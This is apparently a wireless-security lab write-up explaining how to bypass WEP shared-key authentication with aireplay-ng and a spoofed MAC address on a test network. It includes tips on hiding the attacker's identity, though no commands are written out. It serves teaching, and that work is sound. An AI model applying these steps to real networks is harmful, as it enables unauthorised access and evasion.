3.2 - Bypassing WEP Shared Key Authentication
- Unlike
previous practice's attack, the goal of this attack is to bypass WEP
authentication directly, without obtaining the Shared Key, but being
able for the attacker to connect directly to the AP even with a fake
MAC address.
- This
is a more efficient attack against WEP encryption because the steps
and processing involved are less that at the previous practice.
- In
this case, let's set the AP with WEP (64 bits) encryption:
- From the attacker "kali"s command shell, the legitimate client "roch"s connection is detected:
- Either
from a deauthentication or a reconnection of the legitimate client
"roch", packets between the AP and "roch "are
captured and stored at sharedkeyWEP file:
- The
file sharedkeyWEP and its derivatives are created, but the one that
has got interest for the practice is
sharedkeyWEP-01-00-25-F2-9B-91-23.xor:
- Now,
the aireplay-ng command is used in a quite different way than before:
a)
first, the injected packet contains the keystream used for WEP to
authenticate "roch" with the AP.
b)
second, "kali" uses a fake MAC address like
AA:AA:AA:AA:AA:AA to cover any track of the attack.
- Now,
it can be verified that "kali" has joined sucessfully the
network "spaniard":
- Even
receiving an IP through DHCP:
- "kali"
is now part of the network "spaniard", being able to ping
the default gateway 102.168.0.1:
- Also,
"kali" has got access to the Internet using the AP external
interface, pinging Google's public DNS:
- Airodump-ng
detects both clients, the legitimate "roch" and the
attacker "kali", connected to the "spaniard"
network:
- Also,
the AP detects both clients connected, what is funny because "kali"
shows the obviously fake MAC address AA:AA:AA:AA:AA:AA.
- Of
course, in a real attack, "kali" would have choosen a less
suspicious MAC than AA:AA:AA:AA:AA:AA
- As
a conclusion of this practice, the attacker "kali" has been
able to connect a network directly, bypassing WEP Shared Key
authentication, without needing to perform the steps of obtaining the
encryption key, and faking its own MAC address for covering the
attack.
